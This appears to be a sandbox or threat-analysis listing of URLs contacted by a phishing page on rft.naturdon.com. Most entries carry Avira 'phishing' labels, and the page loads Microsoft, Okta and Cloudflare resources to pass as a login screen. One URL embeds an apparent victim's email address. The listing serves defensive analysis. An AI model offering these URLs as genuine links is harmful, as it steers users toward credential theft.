                https://rft.naturdon.com/GDSherpa-bold.woff2 false
                • Avira URL Cloud: phishing
                		 unknown
                https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js false
                  		high
                  https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC true
                    		unknown
                    https://rft.naturdon.com/ijQ0IOXUR1aIdE2dIax8V9VT5mgSv8B3wxiSY8D4KNzfk5az6fKC4B8vvw56170 false
                    • Avira URL Cloud: phishing
                    		 unknown
                    https://rft.naturdon.com/klZUXgOlh2u3Z2ys2P7suUE8OPsvE6D0NZcY24FlEVoyLh1rlCu0zJMqOpqgPM0t8xKY93rEWKezYEZUkbXH3MBDHfCQeW7aWFIDvpz4vU3PIiYP2CoSTMqCoZvmlMmOzASNryz660 false
                    • Avira URL Cloud: phishing
                    		 unknown
                    https://registrosaraquari.com.br/0/index.xslt false
                    • Avira URL Cloud: safe
                    		 unknown
                    https://rft.naturdon.com/rsj9FvgfYrm0DCkU7R3E0ZVRtwZjLNORj7eVq7ghG3bg6DT6IOZl4JRef193 false
                    • Avira URL Cloud: phishing
                    		 unknown
                    https://rft.naturdon.com/dezNUCB7F1KEsi0FN0wryA8y4av4n6Oz1WzLtiMGksrOn987oMYSmcxxtWYou2jfcMbVvmkb60VdA3wr1dwZEXuZoYuejWksgw45j3q4VZxbXQF10CkWdNYZxh3MHx6WHC7lGtJJ6scfMTtvSsNFNJCw93uLSr83gx6zpijd2MxlyhgcWIfR6tYb2L6cd662 false
                    • Avira URL Cloud: phishing
                    		 unknown
                    https://d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.es/bChJbJByRMoiWVIzJsvbypYtqUVUTWUTXNFKJKJACAZSJESGCWVJJAOEENGZXBFSRWIWRBRMCVRFSK12AAuQJBSo78Umueop42 false
                    • Avira URL Cloud: safe
                    		 unknown
                    https://rft.naturdon.com/34ljcaLCdgnxyAWwV8920 false
                    • Avira URL Cloud: phishing
                    		 unknown
                    https://rft.naturdon.com/uvJtmTGXX2g3FEEqQIMgBrLoxZ456mS64jlG3A6l7y7Lxkm6YTIoOlgS7jv42MEgh260 false
                    • Avira URL Cloud: phishing
                    		 unknown
                    https://rft.naturdon.com/iVYo/ true
                    • Avira URL Cloud: phishing
                    		 unknown
                    https://aadcdn.msauthimages.net/dbd5a2dd-vmlo2cc2etebjdqhg-ytquz7jjmmuxj8qlopjyoab6y/logintenantbranding/0/bannerlogo?ts=637919603932887433 false
                      		high
                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js false
                        		high
                        https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css false
                          		high
                          https://rft.naturdon.com/GDSherpa-regular.woff2 false
                          • Avira URL Cloud: phishing
                          		 unknown
                          https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback false
                            		high
                            https://rft.naturdon.com/GDSherpa-vf2.woff2 false
                            • Avira URL Cloud: phishing
                            		 unknown
                            https://rft.naturdon.com/rvBXzyX4Qq50i8TvtNXs8BpqNqxHqx6mzSSKcXalR4B6PLT8k9y false
                            • Avira URL Cloud: phishing
                            		 unknown
                            https://rft.naturdon.com/56ybTuSQ1jJ6y8kcSz0CgEs2AYKij17gyitf7LX4hemrK89103 false
                            • Avira URL Cloud: phishing
                            		 unknown
                            https://rft.naturdon.com/favicon.ico false
                            • Avira URL Cloud: phishing
                            		 unknown
                            https://developers.cloudflare.com/favicon.png false
                              		high
                              https://rft.naturdon.com/GDSherpa-regular.woff false
                              • Avira URL Cloud: phishing
                              		 unknown
                              https://rft.naturdon.com/iVYo/#Ddcabral@pierceatwood.com false
                                		unknown
                                https://rft.naturdon.com/klVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZAopRdu3RNdl8MlVtw7oEWHHR2t8JGp85UDgXLK6yz230 false
                                • Avira URL Cloud: phishing
                                		 unknown
                                https://rft.naturdon.com/optadu1ofPxrFCa4cOe9bGejoa2vR7hUGzGuvm86IppsV4y85FAZpZxeuef235 false
                                • Avira URL Cloud: phishing
                                		 unknown
                                https://get.geojs.io/v1/ip/geo.json false
                                  		high
                                  https://rft.naturdon.com/efueBIf7KMBbXW0qQF2zeji3jy0JijcyRqJUUwcvNTCnOUKvkR78143 false
                                  • Avira URL Cloud: phishing
                                  		 unknown
                                  https://rft.naturdon.com/yzUMXXAK9cdiVG7unTSOjXlhW72wM8rZJ7uRvQrQmnp9mH4LntaZDifn490180 false
                                  • Avira URL Cloud: phishing
                                  		 unknown
                                  https://rft.naturdon.com/ijrlV3hi6dkeYhbR0U6WhmmiYz2MGccNsZegAMCklGrcaCM65n1iEmiCkEsATX4zN3WzSG5I12210 false
                                  • Avira URL Cloud: phishing
                                  		 unknown
                                  https://d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.es/bChJbJByRMoiWVIzJsvbypYtqUVUTWUTXNFKJKJACAZSJESGCWVJJAOEENGZXBFSRWIWRBRMCVRFSKpqYiU5PkU4ch34fiS6guv40 false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  https://rft.naturdon.com/qrhmLtoaKGMi81xl8TzghJ99XVgOdtJgIR4uW45140 false
                                  • Avira URL Cloud: phishing
                                  		 unknown
                                  https://rft.naturdon.com/GDSherpa-vf.woff2 false
                                  • Avira URL Cloud: phishing
                                  		 unknown